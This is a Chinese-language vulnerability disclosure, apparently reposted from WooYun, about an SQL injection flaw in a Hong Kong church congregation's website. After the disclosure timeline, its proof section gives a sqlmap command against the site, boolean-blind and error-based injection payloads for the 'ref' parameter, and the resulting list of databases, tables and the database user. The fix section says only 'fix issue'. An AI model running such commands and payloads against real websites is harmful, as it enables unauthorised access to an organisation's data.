神刀安全网

漏洞标题: 基督教香港崇真會新翠堂存在SQL注射漏洞(香港地區)

漏洞详情

披露状态:

2016-01-30: 细节已通知厂商并且等待厂商处理中
2016-02-01: 厂商已经确认,细节仅向厂商公开
2016-02-11: 细节向核心白帽子及相关领域专家公开
2016-02-21: 细节向普通白帽子公开
2016-03-02: 细节向实习白帽子公开
2016-03-17: 细节向公众公开

简要描述:

基督教香港崇真會新翠堂存在SQL注射漏洞

详细说明:

基督教香港崇真會源自巴色會,一個瑞士巴色城的傳道差會(Basel Evangelical Missionary Society),由改革宗與信義宗會友所組成,是超越宗派的國際福音機構。 1847年巴色會派韓山明牧師(Rev Theodore Hamberg)和黎力基牧師(Rev Rudolph Lechler)開始在香港、珠江、東江及梅江一帶展開福音工作, 1851年在香港島建立第一所教會,主要關注客家族群。 1924年易名為崇真會,此名乃取自「崇拜真神、崇尚真道」之意,而本會在教義、教會體制、以及崇拜儀式各方面,都保有改革宗和信義宗的特色。 現今本會有堂會廿多間,會友人數一萬多人,中、小學、幼兒園共十數間,多間長者中心及綜合服務中心。

地址:沙田大圍美田路一號沙田崇真中學105室

電話:2699 3903

電郵:scttc@**.**.**.**

漏洞证明:

注入地址为 http://**.**.**.**/?ref=department

code 区域
sqlmap -u 'http://**.**.**.**/?ref=department' -v 1 --dbs --batch --random-agent                        [11:49:48]

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://**.**.**.**

[*] starting at: 15:31:57

[15:31:57] [INFO] fetched random HTTP User-Agent header from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/user-agents.txt': Opera/9.24 (Windows NT 5.1; U; tr)
[15:31:57] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session' as session file
[15:31:57] [INFO] resuming injection data from session file
[15:31:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[15:31:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ref
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ref=activities' AND 8064=8064 AND 'wjzH'='wjzH&action=search

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: ref=activities' AND (SELECT 4464 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,97,121,58),(SELECT (CASE WHEN (4464=4464) THEN 1 ELSE 0 END)),CHAR(58,114,121,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'gJEs'='gJEs&action=search
---

[15:31:58] [INFO] the back-end DBMS is MySQL

web application technology: Apache
back-end DBMS: MySQL 5.0
[15:31:58] [INFO] fetching database names
[15:31:58] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session': 2
[15:31:58] [INFO] the SQL query used returns 2 entries
[15:31:58] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session': information_schema
[15:31:58] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**/session': scttc_main
available databases [2]:
[*] information_schema
[*] scttc_main

[15:31:58] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/**.**.**.**'

[*] shutting down at: 15:31:58

scttc_main 17 tables

code 区域
Database: scttc_main
[17 tables]
+----------------------+
| def_group_type |
| def_sharing_category |
| def_status |
| def_user_type |
| t_activities_detail |
| t_attachment |
| t_events_timetable |
| t_group |
| t_group_fellowship |
| t_group_worshipteam |
| t_menu |
| t_news |
| t_rundown |
| t_sharing |
| t_special_rules |
| t_user |
| t_worship_list |
+----------------------+

user

code 区域
database management system users [1]:
[*] 'scttc'@'localhost'

修复方案:

fix issue

版权声明:转载请注明来源 hellokuku@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 基督教香港崇真會新翠堂存在SQL注射漏洞(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址